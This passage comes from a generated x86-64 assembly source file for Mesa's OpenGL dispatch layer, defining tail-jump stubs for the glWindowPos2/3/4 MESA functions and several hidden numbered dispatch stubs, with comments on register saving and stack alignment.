	movq	4992(%rax), %r11
	jmp	*%r11
1:
	subq	$24, %rsp
	movq	%xmm0, (%rsp)
	movq	%xmm1, 8(%rsp)
	call	_glapi_get_dispatch
	movq	8(%rsp), %xmm1
	movq	(%rsp), %xmm0
	addq	$24, %rsp
	movq	4992(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(WindowPos2dMESA), .-GL_PREFIX(WindowPos2dMESA)
	/* Dispatch stubs (generated) for the glWindowPos2* family: fetch
	 * the dispatch table, save live argument registers around the
	 * PTHREADS lookup (%rbp pushes and the 24-byte subq frames exist
	 * only to keep %rsp 16-byte aligned at the call), then tail-jump
	 * through the slot via %r11. */
	/* glWindowPos2dvMESA: slot 5000; 1 GPR arg (%rdi) */
	.p2align	4,,15
	.globl GL_PREFIX(WindowPos2dvMESA)
	.type GL_PREFIX(WindowPos2dvMESA), @function
GL_PREFIX(WindowPos2dvMESA):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5000(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	5000(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5000(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	5000(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(WindowPos2dvMESA), .-GL_PREFIX(WindowPos2dvMESA)

	/* glWindowPos2fMESA: slot 5008; 2 FP args spilled from %xmm0/%xmm1 */
	.p2align	4,,15
	.globl GL_PREFIX(WindowPos2fMESA)
	.type GL_PREFIX(WindowPos2fMESA), @function
GL_PREFIX(WindowPos2fMESA):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5008(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$24, %rsp
	movq	%xmm0, (%rsp)
	movq	%xmm1, 8(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	8(%rsp), %xmm1
	movq	(%rsp), %xmm0
	addq	$24, %rsp
	movq	5008(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5008(%rax), %r11
	jmp	*%r11
1:
	subq	$24, %rsp
	movq	%xmm0, (%rsp)
	movq	%xmm1, 8(%rsp)
	call	_glapi_get_dispatch
	movq	8(%rsp), %xmm1
	movq	(%rsp), %xmm0
	addq	$24, %rsp
	movq	5008(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(WindowPos2fMESA), .-GL_PREFIX(WindowPos2fMESA)

	/* glWindowPos2fvMESA: slot 5016; 1 GPR arg (%rdi) */
	.p2align	4,,15
	.globl GL_PREFIX(WindowPos2fvMESA)
	.type GL_PREFIX(WindowPos2fvMESA), @function
GL_PREFIX(WindowPos2fvMESA):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5016(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	5016(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5016(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	5016(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(WindowPos2fvMESA), .-GL_PREFIX(WindowPos2fvMESA)

	/* glWindowPos2iMESA: slot 5024; 2 GPR args + %rbp pad */
	.p2align	4,,15
	.globl GL_PREFIX(WindowPos2iMESA)
	.type GL_PREFIX(WindowPos2iMESA), @function
GL_PREFIX(WindowPos2iMESA):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5024(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	5024(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5024(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	5024(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(WindowPos2iMESA), .-GL_PREFIX(WindowPos2iMESA)

	/* glWindowPos2ivMESA: slot 5032; 1 GPR arg (%rdi) */
	.p2align	4,,15
	.globl GL_PREFIX(WindowPos2ivMESA)
	.type GL_PREFIX(WindowPos2ivMESA), @function
GL_PREFIX(WindowPos2ivMESA):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5032(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	5032(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5032(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	5032(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(WindowPos2ivMESA), .-GL_PREFIX(WindowPos2ivMESA)

	/* glWindowPos2sMESA: slot 5040; 2 GPR args + %rbp pad */
	.p2align	4,,15
	.globl GL_PREFIX(WindowPos2sMESA)
	.type GL_PREFIX(WindowPos2sMESA), @function
GL_PREFIX(WindowPos2sMESA):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5040(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	5040(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5040(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	5040(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(WindowPos2sMESA), .-GL_PREFIX(WindowPos2sMESA)

	/* glWindowPos2svMESA: slot 5048; 1 GPR arg (%rdi) */
	.p2align	4,,15
	.globl GL_PREFIX(WindowPos2svMESA)
	.type GL_PREFIX(WindowPos2svMESA), @function
GL_PREFIX(WindowPos2svMESA):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5048(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	5048(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5048(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	5048(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(WindowPos2svMESA), .-GL_PREFIX(WindowPos2svMESA)
	/* Dispatch stubs (generated) for the glWindowPos3* family: fetch
	 * the dispatch table, save live argument registers around the
	 * PTHREADS lookup (FP variants spill %xmm0-%xmm2 into a 24-byte
	 * frame, which also keeps %rsp 16-byte aligned at the call), then
	 * tail-jump through the slot via %r11. */
	/* glWindowPos3dMESA: slot 5056; 3 FP args spilled from %xmm0-%xmm2 */
	.p2align	4,,15
	.globl GL_PREFIX(WindowPos3dMESA)
	.type GL_PREFIX(WindowPos3dMESA), @function
GL_PREFIX(WindowPos3dMESA):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5056(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$24, %rsp
	movq	%xmm0, (%rsp)
	movq	%xmm1, 8(%rsp)
	movq	%xmm2, 16(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	16(%rsp), %xmm2
	movq	8(%rsp), %xmm1
	movq	(%rsp), %xmm0
	addq	$24, %rsp
	movq	5056(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5056(%rax), %r11
	jmp	*%r11
1:
	subq	$24, %rsp
	movq	%xmm0, (%rsp)
	movq	%xmm1, 8(%rsp)
	movq	%xmm2, 16(%rsp)
	call	_glapi_get_dispatch
	movq	16(%rsp), %xmm2
	movq	8(%rsp), %xmm1
	movq	(%rsp), %xmm0
	addq	$24, %rsp
	movq	5056(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(WindowPos3dMESA), .-GL_PREFIX(WindowPos3dMESA)

	/* glWindowPos3dvMESA: slot 5064; 1 GPR arg (%rdi) */
	.p2align	4,,15
	.globl GL_PREFIX(WindowPos3dvMESA)
	.type GL_PREFIX(WindowPos3dvMESA), @function
GL_PREFIX(WindowPos3dvMESA):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5064(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	5064(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5064(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	5064(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(WindowPos3dvMESA), .-GL_PREFIX(WindowPos3dvMESA)

	/* glWindowPos3fMESA: slot 5072; 3 FP args spilled from %xmm0-%xmm2 */
	.p2align	4,,15
	.globl GL_PREFIX(WindowPos3fMESA)
	.type GL_PREFIX(WindowPos3fMESA), @function
GL_PREFIX(WindowPos3fMESA):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5072(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$24, %rsp
	movq	%xmm0, (%rsp)
	movq	%xmm1, 8(%rsp)
	movq	%xmm2, 16(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	16(%rsp), %xmm2
	movq	8(%rsp), %xmm1
	movq	(%rsp), %xmm0
	addq	$24, %rsp
	movq	5072(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5072(%rax), %r11
	jmp	*%r11
1:
	subq	$24, %rsp
	movq	%xmm0, (%rsp)
	movq	%xmm1, 8(%rsp)
	movq	%xmm2, 16(%rsp)
	call	_glapi_get_dispatch
	movq	16(%rsp), %xmm2
	movq	8(%rsp), %xmm1
	movq	(%rsp), %xmm0
	addq	$24, %rsp
	movq	5072(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(WindowPos3fMESA), .-GL_PREFIX(WindowPos3fMESA)

	/* glWindowPos3fvMESA: slot 5080; 1 GPR arg (%rdi) */
	.p2align	4,,15
	.globl GL_PREFIX(WindowPos3fvMESA)
	.type GL_PREFIX(WindowPos3fvMESA), @function
GL_PREFIX(WindowPos3fvMESA):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5080(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	5080(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5080(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	5080(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(WindowPos3fvMESA), .-GL_PREFIX(WindowPos3fvMESA)

	/* glWindowPos3iMESA: slot 5088; 3 GPR args (%rdi,%rsi,%rdx) */
	.p2align	4,,15
	.globl GL_PREFIX(WindowPos3iMESA)
	.type GL_PREFIX(WindowPos3iMESA), @function
GL_PREFIX(WindowPos3iMESA):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5088(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5088(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5088(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5088(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(WindowPos3iMESA), .-GL_PREFIX(WindowPos3iMESA)

	/* glWindowPos3ivMESA: slot 5096; 1 GPR arg (%rdi) */
	.p2align	4,,15
	.globl GL_PREFIX(WindowPos3ivMESA)
	.type GL_PREFIX(WindowPos3ivMESA), @function
GL_PREFIX(WindowPos3ivMESA):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5096(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	5096(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5096(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	5096(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(WindowPos3ivMESA), .-GL_PREFIX(WindowPos3ivMESA)

	/* glWindowPos3sMESA: slot 5104; 3 GPR args (%rdi,%rsi,%rdx) */
	.p2align	4,,15
	.globl GL_PREFIX(WindowPos3sMESA)
	.type GL_PREFIX(WindowPos3sMESA), @function
GL_PREFIX(WindowPos3sMESA):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5104(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5104(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5104(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5104(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(WindowPos3sMESA), .-GL_PREFIX(WindowPos3sMESA)

	/* glWindowPos3svMESA: slot 5112; 1 GPR arg (%rdi) */
	.p2align	4,,15
	.globl GL_PREFIX(WindowPos3svMESA)
	.type GL_PREFIX(WindowPos3svMESA), @function
GL_PREFIX(WindowPos3svMESA):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5112(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	5112(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5112(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	5112(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(WindowPos3svMESA), .-GL_PREFIX(WindowPos3svMESA)
.p2align 4,,15
.globl GL_PREFIX(WindowPos4dMESA)
.type GL_PREFIX(WindowPos4dMESA), @function
GL_PREFIX(WindowPos4dMESA):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5120(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _x86_64_get_dispatch@PLT
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 5120(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5120(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _glapi_get_dispatch
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 5120(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(WindowPos4dMESA), .-GL_PREFIX(WindowPos4dMESA)
.p2align 4,,15
.globl GL_PREFIX(WindowPos4dvMESA)
.type GL_PREFIX(WindowPos4dvMESA), @function
GL_PREFIX(WindowPos4dvMESA):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5128(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 5128(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5128(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 5128(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(WindowPos4dvMESA), .-GL_PREFIX(WindowPos4dvMESA)
.p2align 4,,15
.globl GL_PREFIX(WindowPos4fMESA)
.type GL_PREFIX(WindowPos4fMESA), @function
GL_PREFIX(WindowPos4fMESA):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5136(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _x86_64_get_dispatch@PLT
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 5136(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5136(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _glapi_get_dispatch
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 5136(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(WindowPos4fMESA), .-GL_PREFIX(WindowPos4fMESA)
.p2align 4,,15
.globl GL_PREFIX(WindowPos4fvMESA)
.type GL_PREFIX(WindowPos4fvMESA), @function
GL_PREFIX(WindowPos4fvMESA):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5144(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 5144(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5144(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 5144(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(WindowPos4fvMESA), .-GL_PREFIX(WindowPos4fvMESA)
.p2align 4,,15
.globl GL_PREFIX(WindowPos4iMESA)
.type GL_PREFIX(WindowPos4iMESA), @function
GL_PREFIX(WindowPos4iMESA):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5152(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5152(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5152(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5152(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(WindowPos4iMESA), .-GL_PREFIX(WindowPos4iMESA)
.p2align 4,,15
.globl GL_PREFIX(WindowPos4ivMESA)
.type GL_PREFIX(WindowPos4ivMESA), @function
GL_PREFIX(WindowPos4ivMESA):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5160(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 5160(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5160(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 5160(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(WindowPos4ivMESA), .-GL_PREFIX(WindowPos4ivMESA)
.p2align 4,,15
.globl GL_PREFIX(WindowPos4sMESA)
.type GL_PREFIX(WindowPos4sMESA), @function
GL_PREFIX(WindowPos4sMESA):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5168(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5168(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5168(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5168(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(WindowPos4sMESA), .-GL_PREFIX(WindowPos4sMESA)
.p2align 4,,15
.globl GL_PREFIX(WindowPos4svMESA)
.type GL_PREFIX(WindowPos4svMESA), @function
GL_PREFIX(WindowPos4svMESA):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5176(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 5176(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5176(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 5176(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(WindowPos4svMESA), .-GL_PREFIX(WindowPos4svMESA)
	/*
	 * Dispatch stubs 648-656: entry points for extension functions that have
	 * no stable public name in this ABI; HIDDEN() keeps the symbols out of
	 * the library's dynamic export list.  Same pattern as the named stubs:
	 * fetch the dispatch table (%rax), tail-jump through slot*8, preserving
	 * the live argument registers around the lookup in the PTHREADS and
	 * fallback paths (an extra %rbp push pads %rsp to 16-byte alignment
	 * where the push count would otherwise be even).
	 */
	/* stub 648: slot 648 (648*8 = 5184); preserves five integer args
	 * (%rdi/%rsi/%rdx/%rcx/%r8) -- five pushes are already aligned */
	.p2align	4,,15
	.globl GL_PREFIX(_dispatch_stub_648)
	.type GL_PREFIX(_dispatch_stub_648), @function
	HIDDEN(GL_PREFIX(_dispatch_stub_648))
GL_PREFIX(_dispatch_stub_648):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5184(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	call	_x86_64_get_dispatch@PLT
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5184(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5184(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	call	_glapi_get_dispatch
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5184(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(_dispatch_stub_648), .-GL_PREFIX(_dispatch_stub_648)

	/* stub 649: slot 649 (5192); preserves all six integer argument
	 * registers plus a %rbp alignment pad (seven pushes -> aligned) */
	.p2align	4,,15
	.globl GL_PREFIX(_dispatch_stub_649)
	.type GL_PREFIX(_dispatch_stub_649), @function
	HIDDEN(GL_PREFIX(_dispatch_stub_649))
GL_PREFIX(_dispatch_stub_649):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5192(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5192(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5192(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5192(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(_dispatch_stub_649), .-GL_PREFIX(_dispatch_stub_649)

	/* stub 650: slot 650 (5200); two integer args + %rbp pad */
	.p2align	4,,15
	.globl GL_PREFIX(_dispatch_stub_650)
	.type GL_PREFIX(_dispatch_stub_650), @function
	HIDDEN(GL_PREFIX(_dispatch_stub_650))
GL_PREFIX(_dispatch_stub_650):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5200(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	5200(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5200(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	5200(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(_dispatch_stub_650), .-GL_PREFIX(_dispatch_stub_650)

	/* stub 651: slot 651 (5208); single arg in %rdi */
	.p2align	4,,15
	.globl GL_PREFIX(_dispatch_stub_651)
	.type GL_PREFIX(_dispatch_stub_651), @function
	HIDDEN(GL_PREFIX(_dispatch_stub_651))
GL_PREFIX(_dispatch_stub_651):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5208(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	5208(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5208(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	5208(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(_dispatch_stub_651), .-GL_PREFIX(_dispatch_stub_651)

	/* stub 652: slot 652 (5216); two integer args + %rbp pad */
	.p2align	4,,15
	.globl GL_PREFIX(_dispatch_stub_652)
	.type GL_PREFIX(_dispatch_stub_652), @function
	HIDDEN(GL_PREFIX(_dispatch_stub_652))
GL_PREFIX(_dispatch_stub_652):
